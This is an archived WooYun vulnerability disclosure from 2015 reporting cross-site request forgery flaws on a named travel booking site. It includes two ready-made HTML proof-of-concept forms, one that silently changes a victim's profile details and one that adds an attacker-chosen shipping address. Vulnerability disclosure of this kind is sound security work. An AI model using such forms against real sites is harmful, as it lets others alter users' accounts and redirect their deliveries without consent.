乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-06: 细节已通知厂商并且等待厂商处理中 2015-09-06: 厂商已经确认,细节仅向厂商公开 2015-09-16: 细节向核心白帽子及相关领域专家公开 2015-09-26: 细节向普通白帽子公开 2015-10-06: 细节向实习白帽子公开 2015-10-21: 细节向公众公开
如题
一、基本资料1、地址
https://cn.toursforfun.com/account_edit.php#my-information
2、修改资料时抓包,生成POC
POC:
<html> <body> <form action="https://cn.toursforfun.com/account_edit.php" method="POST"> <input type="hidden" name="sur_name" value="test123" /> <input type="hidden" name="given_name" value="Given name" /> <input type="hidden" name="chinese_name" value="test123" /> <input type="hidden" name="email" value="test0123@qq.com" /> <input type="hidden" name="country_code" value="" /> <input type="hidden" name="cell" value="" /> <input type="hidden" name="country_id" value="243" /> <input type="hidden" name="zone_id" value="322" /> <input type="hidden" name="city" value="" /> <input type="hidden" name="state" value="" /> <input type="hidden" name="street_address" value="" /> <input type="hidden" name="zip" value="" /> <input type="hidden" name="sex" value="m" /> <input type="hidden" name="dob" value="0000-00-00" /> <input type="hidden" name="birthday_secret_type" value="0" /> <input type="hidden" name="other_phone" value="" /> <input type="hidden" name="submit" value="保存信息" /> <input type="submit" value="Submit form" /> </form> </body></html>
3、点击POC之前
4、点击POC之后
二、收货地址劫持:直接写上POC了1、地址:
http://cn.toursforfun.com/address_book.php?action=add
POC
<html> <body> <form action="http://cn.toursforfun.com/address_book.php?action=add" method="POST"> <input type="hidden" name="description" value="test" /> <input type="hidden" name="type" value="0" /> <input type="hidden" name="first_name" value="test" /> <input type="hidden" name="last_name" value="test" /> <input type="hidden" name="chinese_name" value="test" /> <input type="hidden" name="email_address" value="test1234@qq.com" /> <input type="hidden" name="cellphone" value="132873876" /> <input type="hidden" name="country_id" value="223" /> <input type="hidden" name="zone_id" value="" /> <input type="hidden" name="city" value="" /> <input type="hidden" name="state" value="New York" /> <input type="hidden" name="street_address" value="test" /> <input type="hidden" name="zip" value="010000" /> <input type="hidden" name="other_phone" value="" /> <input type="hidden" name="id" value="" /> <input type="hidden" name="action" value="add" /> <input type="hidden" name="submit" value="保存" /> <input type="submit" value="Submit form" /> </form> </body></html>
2、我验证过是可以了,但是懒得截图了
危害等级:低
漏洞Rank:2
确认时间:2015-09-06 13:41
经确认漏洞存在下次提交请先将csrf poc的value值html解码,谢谢
暂无